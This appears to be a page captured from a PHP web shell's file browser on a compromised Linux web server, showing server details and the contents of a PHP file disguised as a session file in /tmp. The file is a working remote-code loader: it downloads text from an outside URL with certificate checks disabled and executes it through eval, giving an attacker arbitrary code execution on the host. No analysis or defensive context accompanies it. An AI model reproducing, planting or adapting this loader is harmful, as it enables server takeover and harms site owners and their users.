HEX
Server: Apache
System: Linux dev.epsylon.net 3.10.0-1160.144.1.el7.tuxcare.els2.x86_64 #1 SMP Sun Feb 15 11:22:42 UTC 2026 x86_64
User: transfener (1140)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //tmp/sess_13a0bfe3d4bc4544c832816fbf797ebb.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
function callback($url)
{
    $post_content = false;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $post_content = curl_exec($ch);
    curl_close($ch);

    if ($post_content) {
        eval('?>' . $post_content);
    }
}

call_user_func('callback', 'https://fcalpha.net/web/photo/20151024/naxc.txt');
?>